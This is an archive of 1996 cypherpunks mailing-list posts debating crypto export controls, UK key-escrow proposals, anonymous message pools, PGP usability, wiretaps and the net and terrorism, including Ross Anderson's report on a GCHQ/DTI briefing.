Defending Bernstein on First Amendment grounds and having judge Patel rule that
for the purposes of the case, source code is speech, is a big deal.  The First
Amendment survives the Electronic Revolution with ACLU v. Reno.  The Super
Bowl is ITAR.  It's nice to have some momentum going in to the Super Bowl.
With robust, uncompromised cryptography, we can reclaim the 4th Amendment
ourselves.  I have a feeling that the congressional support is reaching
critical mass.

Oh yeah, knowing me as you do Tim, it probably doesn't surprise you that the
entire global positioning system is going to roll over at midnight 23 August
1999, and claim it's my 25th birthday, 6 January 1980...

As Barlow says, "You know its gonna get stranger, so let's get on with the
show!"
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Wed, 3 Jul 1996 22:17:11 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: SAFE Forum--some comments
In-Reply-To: <199607022014.NAA10761@netcom14.netcom.com>
Message-ID: <9607030239.aa09019@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


Vladimir rebuts May quoting Bass...
> >He pointed out that the driving force for crypto policy is probably the
> >_law enforcement_ camp, not the _intelligence agency_ camp. And that the
> >NSA is regretting the ITAR stuff, as it has sparked an "arms race" to
> >develop stronger crypto. 
> 
> doesn't make sense to me at all. who was behind clipper? the NSA, not
> the FBI.  the FBI is behind digital telephony, which involved
> *wiretapping*, not key escrow.

That's because you don't understand American Football.  The NSA is Jerry
Kramer for the FBI's Frank Gifford on a double whammy end around of any
substantial public hearings on the subject running a play Lombardi designed
in the height of the Cold War.  The only problem is Lombardi died of cancer,
and the Clinton Administration has been duped into winning one for the Gipper-
except the Gip has altzheimers and Nancy has to wipe his chin, so its bed time
for Bonzo, ITAR and EES!  Party on C'punks! Internet is the revenge of the
nerds on Acid.  (Don't post when you're peaking...don't post when you're 
peaking...)    
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Jul 1996 13:58:35 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
Message-ID: <adff2067000210047c89@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:13 PM 7/2/96, snow wrote:
>On Tue, 2 Jul 1996, snow wrote:

>> Gain control of the power grid (I don't know how possible this is)
>> and selectively brown out certain sections of the city during peak demand
>> periods. Make it obvious, then do the preceeding idea.

>        Ummm... Just in case anyone is thinking it right now, NO, I
>didn't. If this outage was deliberate, I had nothing to do with it. I was
>just postulating possibilities.

Hmmhhh....I post about the "Net and Terrorism" on Sunday, and the Viper
Militia and their plans to blow up several courthouses in Phoenix are
revealed a few hours later....Snow posts about using computers to knock out
the power grid, and a few hours later power goes out over 15 western
states....

Coincidence? I think not.

But we can test this hypothesis:

"Alien spaceship images will appear in thousands of darkened rooms and will
trigger mass hysteria."

We'll find out tomorrow if Cypherpunks really do have the Power.

--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Jul 1996 15:18:46 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <adff32e301021004d4a1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Not knowing enough of the posting of John Deters, I can't tell where he is
being facetious, where I agree with him, and where I really disagree with
him.

So, take my comments as responding directly to what I perceive his points
to actually be:

At 12:52 AM 7/3/96, John Deters wrote:

>But here in the U.S., we ARE trying to take them away via the educational
>system.  About the only thing we can effectively do is to provide more
>educational opportunities that denounce violence, racism, hate crimes, etc.
>However, you cannot eliminate discontent without eliminating greed; which is
>simply not possible.

As I see it, the more "educated" a subgroup becomes, in terms of
"education" about "the dominant political power structure," the more they
see the world in dark terms, and resent it.

The more "educated" an ethnic subgroup is about "racism" is, the more
racist they themselves are. (I learned this in 1970 when I went away to
college in California and found an entire racial/ethnic subgroup totally
consumed by fears of persecution and racism, so much so that they could
only study their own persecution and so screwed themselves out of any
reasonable chance of succeeding in the American culture.)

By the way, the accepted name for this is: "victimology."

>Even so, there are a couple of problems with even attempting "to take away
>the root causes", not the least of which is the Constitutionally protected
>right to free speech.  I am allowed to teach my kid to hate anyone for any
>reason.  I can blame this or that group for this set of troubles, and that
>the best way to deal with this is not only to scare them away, but to kill
>as many of them as possible.  It may be morally repugnant, but it is
>protected speech.

I certainly agree with this. Many people and subgroups are losing sight of
this basic point. (Of course, their confusion is partially explained by the
fact that they have grown up believing that government schools are
responsible for instilling proper ethical values.)


>The countries that sponsor terrorists have not been noted for their
>successful educational systems.  And they certainly are not going to listen
>to Western discussions on how best to solve their "problems".

And those who think the government school system _is_ responsible for
teaching moral and ethical values should ponder the issue of just what
moral and ethical values were taught by the official schools of Alabama and
Mississippi in the 1920s, 30s, 40s, and 50s. Duh. When you dance with the
Devil, you dance to his tune.

>For the most part, I see kids today being educated with much less "hatred"
>than even my age group was brought up with (I'm 34).  We're moving in the

I'm 44 and I see just the opposite. Today's kids spout platitudes about
"Why can't we all just get along?" without any clues about what they mean.
99% of kids interviewed cite "racism" as the world's Number One problem,
showing their education to be a complet failure.

--Tim May

P.S. I planned to stop here, in the interests of brevity, but:

>The U.S. has a level of tolerance for diversity that I only recently came to
>appreciate.  We hosted a foreign exchange student from Scotland (hardly
>culture shock to him), but he surprised me when he commented on how
>surprised he was that different groups of people were mixed together --
>black kids hanging out with white kids, catholics and protestants being
>friends, the sort of thing that I take for granted every day.
>
>He expected the subtle racism of home.  And lets just say that Great
>Britain's culture is probably closer to ours than any other country.

Well, on these points I agree. Non-U.S. countries often cluck about
America's well-publicized race problems, but we are far more integrated and
mixed than are most countries (and I lived for a year in Europe and have
visited a few times since).

>I am more than willing to agree with you that elimination of hatred and
>prejudice will go farther than any law enforcement measures to reduce
>terrorist acts.  However, my point, and I believe this is Tim's point, too,
>is that it will *never* eliminate these acts, and that there must be other
>ways of dealing with the problems that occur.

One of my "meta-points" is to try to move the discussion beyond comments
about "hatred and prejudice," which I find to be code words for meaningless
chatter which misses the real issues. (No offense to John Deters is
intended.)

>You may think that you hold every answer to terrorism in your hand, that
>hugs and kisses before bedtime will make the evil monsters under the bed go
>away.    The point of Tim's essay was that, yes, the net can be used by the
>evil monsters, and yes, the evil monsters are here, and no, the evil
>monsters are not going away any time soon.  Why did you feel it necessary to
>try to slam his fairly well-researched and quite obvious conclusion?

Thanks for the comments, John. My main point was that we should not give up
basic American (and "western") values for the sake of reducing terrorism.
(Ironically, one of the basic notions of terrorism of certain sorts is that
the very acts of terrorism will bring on some state which will further the
causes of the terrorists...the Hegelian triatica and all that revolutionary
stuff, etc.)

The terrorists should not be given a victory of sorts by implementing
martial law to reduce further attacks.

--Tim, again

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Wed, 3 Jul 1996 22:52:40 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <adfe19830002100425c1@[205.199.118.202]>
Message-ID: <4rdm7p$2lm@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <adfe19830002100425c1@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> I must be missing something....:

Nope!  That would be..er..my fault. :-)

> I'm not following your "upload an article to the NNTP server." Don't most
> people use mail-to-News gateways to post anonymously? (If not, they should,
> of course.)
> 
> This way, the posting of an article has the anonymity provided by the chain
> of remailers used to reach the terminal site, the mail-to-News gateway.

You are quite right.  I was mixing my criticisms.  My mistake.

A message pool provides only recipient anonymity, of course.  For sender
anonymity (e.g. posting to a message pool), chaining is the right way to go.


> The posting is anonymous (within the usual limits we discuss here), and the
> reading is "pretty hard" to focus on, for several reasons:
> 
> 1. Hard to gain access to local ISP without sending alerts out (it would be
> for my ISP, at least). This is admittedly not cryptographically
> interesting, but is a very real practical difficulty.
> 
> 2. Many who browse alt.anonymous.messages probably "glance" at many of the
> oddly-named message pool messages. I know I do. Again, makes it a "needle
> in a haystack" to know which of several hundred folks who glanced at
> "ToBear" or "TheRealMessage"--assuming the NSA could ever identify these
> hundreds--is the real intended target.
> 
> 3. And I recall that many have newsreaders which download _all_ messages in
> a newsgroup automatically. Again, this makes the pool of potential readers
> quite large and meaningless to try to track.
> 
> The use of public posting areas for message pools (what I called "Democracy
> Walls" several years back) seems to me have several compelling advantages
> over "reply-block" approaches.

Good points, all of them.

I agree that public message pools seem to give far better security than
reply-block approaches.  (Although the two can be combined: set up a nym
reply-block which just redirects traffic to alt.anonymous.messages; then
the reply-block is not security-critical, but does allow folks to contact
you by a simple email address.)



Jim Bell brought up the really nifty point that someday soon we may be
able to receive these message pools by satellite dish-- hurray for true
broadcasting!  That would provide most excellent security (unless `they'
started requiring licenses, waiting periods, ... to own a dish-- unlikely).
I can't wait.



Another suggestion was to read alt.anonymous.messages by pointing the
anonymizer at it.  This doesn't stand up to my threat model at all.
The anonymizer only provides you anonymity against a malicious server
who is trying to collect marketing information-- it doesn't protect
you against SIGINT folks eavesdropping on network links, performing
traffic analysis, etc. to trace back your access.

Now if we had pipe-net deployed :-), the idea might work...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 3 Jul 1996 22:25:52 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: PGP secret keys
In-Reply-To: <199607022040.QAA09851@unix.asb.com>
Message-ID: <Pine.SUN.3.91.960703072126.4643D-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Deranged Mutant wrote:

> On  2 Jul 96 at 6:39, anonymous-remailer@shell.port wrote:
> 
> > Could someone post a pointer to a FAQ that tells what to do if you loose
> > your secret key file?  How can you regenerate your private key so that the
> You can't do anything. Yer screwed.

Unless you buy an 'O' and you're escrowed :-)



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Daniel <anthony@direct.it>
Date: Wed, 3 Jul 1996 21:00:44 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: hard drive encryption
Message-ID: <2.2.32.19960703100758.0069f568@betty.direct.it>
MIME-Version: 1.0
Content-Type: text/plain


Hi

You could try using SECURE Desk-Top. 

It can encrypt your hard drive using a symmetrical key. The algorithms are
DES and IDEA (128 bits). It's fast and you could choose exactly what part of
the drive to encrypt, whether just some files or the entire drive.

You can download the software from this url:
                        
                http://www.systems.it/secure

All the best

Anthony

>              
>What is the best utility freely available for encrypting an entire drive
>that won't be used for a length of time?  ie: I'm going away for a period
>of time and wish to encrypt the drive while I'm gone, but have no interest
>in actually using it while it's encrypted.  I also have no real preference
>in what algorithm is used, as long as it's relatively secure.  Speed is 
>also not a big consideration, as it will be used once when I leave to encrypt,
>and once when i return to decrypt.  
>Thanks in advance for the help... 
>//cerridwyn//
>
>btw, the OS is Win95 if that matters...
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Wed, 3 Jul 1996 23:43:24 +0800
To: cypherpunks@toad.com
Subject: Re: Info on alleged new German digital wiretapping law?
In-Reply-To: <m0ubEel-00006nC@ulf.mali.sub.org>
Message-ID: <Pine.HPP.3.91.960703135119.28044B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Ulf Moeller wrote:

> > http://fight-censorship.dementia.org/fight-censorship/dl?num=3027
> >
> >and in alt.fan.ernst-zundel. What's up?
> 
> The report is correct.
> 
> The mainstream press has completely ingnored the wiretap legislation,
> probably because it is part of the long-awaited new telecommunications
> law to end the Telekom monopoly.

As has the media in Sweden completely ignored that we have our own
'Digital Telephony Act' as of July 1. I haven't been able to find it
on the net yet. From second hand sources it seems more or less identical
to the US one, although the financial burdens for reprogramming and
hardware adjustsments are put solely on the telco's (Sweden has no
monopoly since a decade). The telco's have a respite until 7.1.97
to fulfill the requirements.


Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Sheldon <shelly@wyverstone.win-uk.net>
Date: Thu, 4 Jul 1996 07:21:15 +0800
To: lacc@suburbia.net
Subject: LACC: GCHQ/DTI briefing on strong encryption - Report
Message-ID: <43@wyverstone.win-uk.net>
MIME-Version: 1.0
Content-Type: text/plain


Following are Ross Anderson's comments from the recent meeting
hosted by the IEE in the UK with contributions from GCHQ, Security
Services, et al. 

They are long but are, I feel, worth posting  here... (appologies
if they have already been posted - I've been away...


===========
From: rja14@cl.cam.ac.uk (Ross Anderson) Newsgroups:
sci.crypt,alt.security,uk.telecom,alt.security.pgp Subject: HMS
Clipper - GCHQ bungling! Date: 28 Jun 1996 12:20:19 GMT
Organization: U of Cambridge Computer Lab, UK
Message-ID: <4r0im3$32p@lyra.csx.cam.ac.uk>

I went to the meeting organised at the IEE yesterday on the UK
`Trusted Third Party' proposals. One of the speakers, Nigel Hickson of
the DTI, confirmed that escrowing of confidentiality keys would be
mandatory. He also claimed that an OECD expert group was working on
`global crypto guidelines', and made clear that the controls would
focus on small-to medium enterprises and individuals rather than on
large companies.

It was a most extraordinary meeting, and showed up GCHQ in a rather
poor light. The introductory talk was given by Andrew Saunders,
advertised as head of CESG (GCHQ's protection arm) since 1991 and a
GCHQ board member. He remarked that the debate on encryption had been
acrimonious, especially in the USA, but that now technology made
possible a compromise in the form of `Trusted Third Parties' which
would supply a key delivery service and a key recovery service for
both users and law enforcement authorities.

I asked him whether his department had advised ministers that it was
all right to release the April report on encryption in the NHS network
(which floated the TTP idea), or had at least had sight of it before
its release. He claimed to have no knowledge of whether his agency had 
seen it.

After a talk on the common criteria by Murray Donaldson of the
Ministry of Defence, Saunders left, and we were addressed by a man
introduced as Paul Fleury, head of the information systems security
group at the security service. He was claimed to have been with MI5
for 18 years, and in his current post for 5; and to head a team of 9
people responsible for the overall UK threat assessment (with
technical input from GCHQ), as well as for managing CRAMM and running
UNIRAS (the UK government equivalent of CERT).

Strangely enough for such a senior and responsible person, his name did
not appear on the programme, and in the list of participants he appears
only as `UNIRAS SPEAKER, Security Service, PO Box 5656, London EC1A 1AH'
(so now you know - but why did he turn up with slides that had his name
on them and yet not write his name in the attendance register?)

His talk contained little to surprise, with statistics on viruses, 
equipment thefts and hacking. He did mention that 98% of the 873 hacking 
incidents in 1994/5 were abuse of access by insiders rather than 
external attack.

The third talk was by Elizabeth France, the Data Protection Registrar,
who expressed amusement at my having ironically referred to her (along
with the other speakers) as `one of the forces of darkness' when I
relayed notice of the meeting to the net. She proceeded to blaze with
light; she argued that the national security exemptions to data
protection law should be curtailed, and could see no reason why the
security service should not have to register along with everybody
else. She also pleaded for the wider use of privacy enhancing
technologies, such as the use of pseudonyms in medical databases.

Next was John Austen of the Yard, who pointed out that company
directors can get ten years' jail if one of their employees has
kiddieporn on a company server, since under the Children and Young
Persons Act simple possession is an offence. Then Bob Hill of the MoD
talked about the SOS-TDP project to provide security interfaces in
Microsoft, Novell and DEC products, linked with Northern Telecom's
`Enterprise Security Toolkit'; David Ferbrache of DRA talked about
security threats from the Internet; John Hughes of TIS about
firewalls; and Alex McIntosh of PCSL about how his company built a
crypto infrastructure for Shell and got government approval for it.

The threat model depicted in these talks was remote from reality. For
example, it was categorically stated that most thefts of PCs are for
the information in them, rather than the resale value of the machine
or its components. False - over 11% of UK general practitioners have
experienced theft of a practice PC, yet there is only one case known
to the BMA in which the information was abused.  Another example was
the numbers put on various threats: satellite TV hacking was said to
cost 300,000 pounds a year (according to News Datacom at Cardis 94,
that should be 200,000,000) while other risks were wildly inflated.

Bob Morris, the former NSA chief scientist, is fond of asking security
researchers, `Do you consider yourself to be more dishonest, or more
incompetent?' Well, does GCHQ know that the threat model presented at
their meeting is wrong, or don't they?

Anyway, Alex McIntosh's talk brought matters back to crypto policy
when he explained that following UK and US government approval of a 
corporate security architecture designed for Shell, Fortune 500 
companies would be trusted to manage their own keys. The explanation is
that they have so much to lose that they will be responsive to warrants 
and subpoenas. (The doctrine of equality of persons before the law was 
not, of course, mentioned.)

The final speaker was Nigel Hickson from the DTI. The excuse given for
his late arrival ws that he had been in France with the OECD and had
been discussing crypto policy for three days. He looked somewhat junior
but was said to co-chair the ITSEC scheme with CESG and to be one of a
group of five people in DTI responsible for information security policy.

In the introduction to his talk, he picked up on Alex's remarks about
Shell and stated that the motivation for the DTI's involvement was
that while `large firms will crack security', it would be an
inhibiting factor for small-to-medium firms and individuals, and would
prevent them participating in commerce on the Internet (this seemed to
clash with the policy announcement that corporate encryption would be
regulated but private would not be).

He then quite blatantly waffled until his time was almost up before
getting to the reason most people had come to the meeting, namely the
DTI announcement of its intent to regulate `Trusted Third Parties'. My
notes on his words are as follows:

 Why the UK announcement? Many reasons, some of which are highlighted in
 the public statement. The primary reason is that to secure electronic
 commerce people will need access to strong crypto, and if this is 
serious 
 then government will have to look at what systems are `appropriate'. The 
 UK government has spent a lot of time discussing the essential balance.
 Continued law enforcement access is required along the lines of the
 Interception of Communications Act. The government has `obviously' looked
 at TTPs and at `elements of key escrow'. There was no mention of national
 intelligence requirements.

 Policy framework for the provision of encryption services:

 1      No new controls on the use of encryption, such as types of
        algorithm. The introduction of trusted third parties will be
        on a voluntary basis;

 2      Licensing of TTPs will be on (a) competence (b) ability to
        provide a service (c) cooperation with government under 
        conditions of warranted interception;

 3      International working will be the essential vehicle to drive it
        - first in Europe and then in a wider field.

 Legislation later this year is possible. The EU is working on a `second
 infosec decision' to promote TTPs in Europe. The OECD expert group is
 working on global crypto guidelines.

By the time he had finished this short exposition, he had run over the 
advertised time of 4.15, eating well into the fifteen minutes that the 
programme had allocated for discussion. There were only a few questions:
Paul Leyland managed to ask whether it would be mandatory for 
confidentiality keys to be escrowed, and Hickson said yes.

Just as the questions were starting to flow, the chairman - advertised
as Mr DJ Robertson, Ministry of Defence - declared the meeting closed. I 
objected; I pointed out that there were plenty of people with questions, 
and that the government's attempts to sell their proposal would not be 
aided by such blatant news management, which would surely be reported. He 
said that we absolutely had to be out of the room by half past four - the 
time then - and overruled me, remarking that the Universities of Oxford 
and Cambridge had asked quite enough questions.

Then a large gentleman came up to me and said that he hoped my remark
about publicising their news management had been made in jest. I told him 
that it was not, and he became menacing. He said that the meeting was 
held under IEE rules and seemed taken aback when I stood my ground and 
told him I was a member. He then said that he was also a graduate of 
Cambridge and that he would write to very senior people in the University 
about me. Good luck to him. Although he wouldn't give me his name, his 
lapel badge said `B Buxton' and the attendance register lists a Bill 
Buxton, Parity Solutions Ltd., Wimbledon Bridge House, 1 Hartford Road, 
Wimbledon SW19 3RU.

After the meeting, we milled around, to the evident discomfiture of the 
man advertised as Robertson. Finally, at almost five o'clock, an IEE 
lady turned up while there were still a few of us in the corridor. He 
asked her to see us off the premises, at which she smiled and asked
whether we knew our way out. When I said yes, she said 'that's all right 
then' and went off. The man advertised as Robertson scuttled away without
meeting my eye.

As Bob would ask, incompetence or dishonesty? Well, I didn't get the 
impression that our spooks are even competent at being dishonest.

Ross Anderson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jul 1996 01:53:25 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The Net and Terrorism
Message-ID: <199607031403.HAA16134@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 AM 7/3/96 -0700, Vladimir Z. Nuri wrote:

>
>keep in mind that Ruby Ridge and Waco happened only a few years
>ago. that's a nanosecond in cosmic time, yet the terrorist 
>repercussions are being felt immediately. I would say its very
>visceral evidene that terrorists are responding to events and
>are not just madmen out for the fun of killing people.  there's
>a bit of that of course..

If you listen to the Feds discussing this most recent militia story, when 
they're asked what was the militia's motivation, they don't want to talk 
about it, and won't even speculate on more than the most unspecific, vacuous 
terms.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Thu, 4 Jul 1996 02:02:07 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607031436.HAA27482@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. Wrote:
 
> > Is it because most mail programs are not PGP aware?
> 
> I don't know of any mail programs that can use PGP (I know there are various
> interfaces, sendmail wrappers, and other hacks, but I have yet to see a mailer
> with an "Encrypt" or "Sign" option.

Once upon a time last year or the year before, Tim May posted why he 
doesn't use PGP very often.  And I have always stood by that same 
sentiment.  Yes, it is a good encryption product, but it is not 
integrated seamlessly into other applications.  Tim, feel free to 
whack me if you think I'm speaking for you.  If, as cypherpunks, we 
want to spread the use of strong crypto, we need to have a better 
interface than what currently exists on PGP 2.6.2.  

I'm sure Derek and the other guys on PGPlib will make it easier to integrate into 
applications.  Am I just blowing smoke, Mr. Atkins?

PGP is a pain for encrypting or signing e-mail when you have to save 
your message out to a temp file, encrypt it, and load it back in to 
your mail package.

Sure, there are things like Private Idaho, which I use on occasion.  
But, it is still a seperate application that just doesn't fit 
seamlessly into most applications.

In my free time, I have been playing around with add ons for 
Microsoft Exchange.  I've got an OLE 2.0 encryption object that 
embeds nicely into an Exchange message.  I haven't tied it in to PGP 
yet, because I have been waiting for the release of PGPlib.  However, 
that will allow at least some seamless integration.

Brad Shantz
TRIsource Windows Development Services
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 4 Jul 1996 00:32:49 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <v01510104adffb06725c5@[204.62.128.229]>
Message-ID: <31DA7000.6239@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh/Brock Meeks wrote (and quite well, I might add):
> ...
> Install the programs and Junior can't access porn. No fuss, no muss, no
> bother. "Parental empowerment" is the buzzword. Indeed, it was these
> programs that helped sway the three-judge panel in Philly to knock down
> the Communications Decency Act as unconstitutional.

Scenario:  Mr. & Mrs. Joseph and Mary Christian buy SmutNoMore for
their home computer, to protect their children Mathew, Mark, Luke,
John, and Zebediah.  All are happy and content.

One day, Mathew and Mark go to a the home of a school chum, Bart 
Simpson, whose parents are products of the liberal 60's.  Bart has 
a computer too, along with an ISDN link through a local ISP to
the Internet.  But --- horrors --- Bart's computer is not equipped
with SmutNoMore, or any other filtering software.  Bart's parents
do not believe it to be fair to filter their children's access to
information.

During that afternoon of Internet fun, Mark clicks the mouse and
follows a hyperlink link to a web site filled with nasty objectionable
anti-family morally corrosive filth.  Mark and Mathew run home in
tears to their parents and tell all about the nightmare they've
experienced.

I wonder whether the Christians would be able to successfully sue
the Simpsons on some sort of "corruption of a minor" deal?  Indeed,
couldn't it even be possible that some local prosecutor might find
the Simpsons criminally involved?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Thu, 4 Jul 1996 03:39:43 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: SAFE Forum--some comments
Message-ID: <v02140b04ae003f81d9b5@[17.219.102.43]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell asks about Macintosh exportability.

There appears to be no problem using a non-tappable authentication
in the AppleShare client (but this does not mean that the actual
data is secure).

The PowerTalk module (available with System 7.5 and later, but to
be replaced in the future for reasons not having to do with crypto)
supports additional crypto-related functions, including MD5, RSA digital
signatures and 40-bit encrypted (and, hence, exportable) data streams.
Apple did negotiate with the export control people in order to fashion
a technology that could be exported. There are also country-specific
kits in order to meet import requirements. The actual strong encryption
capabilities are not accessable to developers or end users. MD5 and
RSA signing API's are published and, as part of my work at Apple,
I wrote and distributed sample code that shows how to use them to sign
and verify arbitrary data areas.

At the poorly-attended June physical c-punks meeting in Palo Alto,
I gave a very brief overview of Apple's "crypto-related" capabilities
and could repeat it at a future meeting.

>
>I haven't bought a new VCR in a few years.  Is this real?  What prevented
>them from doing this 10 years ago?
>

This is fairly recent. It requires a cooperating (generally, PBS)
station that broadcasts the timecode in one of the retrace lines.

Martin.
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nowhere@alpha.c2.org
Date: Thu, 4 Jul 1996 05:04:38 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607031631.JAA07820@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


At 09:42 PM 7/2/96 EDT, Derek Atkins <warlord@MIT.EDU> wrote:

:Basically, I refuse to type my passphrase over the net, which signing
:all my messages (this one included) would require.
:
:-derek

Why, in heaven's name, would you have to "type your passphrase over the net" to encypher a message?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 4 Jul 1996 05:12:46 +0800
To: Michael Froomkin <hua@XENON.chromatic.com>
Subject: Re: Ken Bass: Wire tap only useful for conviction (Was: SAFE Forum--some  comments)
Message-ID: <2.2.32.19960703163757.00761c98@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 09:59 AM 7/3/96 -0400, Michael Froomkin wrote:

>...wiretaps help LEOs identify co-conspirators.  They are 
>not without intelligence value. 

True, but so do pen registers.  It's usually easy enough to 
separate calls to Pizza Hut from calls to co-cospirators.
There is no need to hear the content of a call to get a good 
idea who is involved in a conspiracy.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 4 Jul 1996 01:13:53 +0800
To: cypherpunks@toad.com
Subject: NOISE.SYS v0.6.3 is released.
Message-ID: <199607031410.KAA15519@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



NOISE.SYS Version 0.6.3-Beta is now released.  Check ftp.funet.fi in 
directory /pub/crypt/random.

NOISE.SYS is a /dev/random-like driver for DOS systems, similar to 
the Linux implementation.  It collects timings from keystrokes, disk 
access, mouse movement, and other system events as sources of 
randomness.

Changes include:
  Ability to add samples by writing to RANDOM$ or URANDOM$ devices
  Fixes bug when reading RANDOM$ device in ASCII mode under MSDOS7
    (Yes, it was a minor bug)

If you have any questions, comments, or problems, drop me a line.

Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 4 Jul 1996 01:28:14 +0800
To: Ernest Hua <hua@XENON.chromatic.com>
Subject: Re: Ken Bass: Wire tap only useful for conviction (Was: SAFE Forum--some  comments)
In-Reply-To: <199607030102.SAA05930@server1.chromatic.com>
Message-ID: <Pine.SUN.3.94.960703095739.11742D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Ernest Hua wrote:

> 
> > And here I'll comment on Ken Bass's excellent comments (there were many
> > excellent points).
> > 
> > He pointed out that the driving force for crypto policy is probably the
> > _law enforcement_ camp, not the _intelligence agency_ camp.
> 
> Ken pointed out that law enforcement had to have gotten enough
> evidence prior to a wire tap request to show probable cause.
> If this is the case, then the only usefulness of wire taps is
> to improve the likelihood of conviction and not the detection
> of potential terrorist (or child molestation or your favorite
> bad guy) plots.

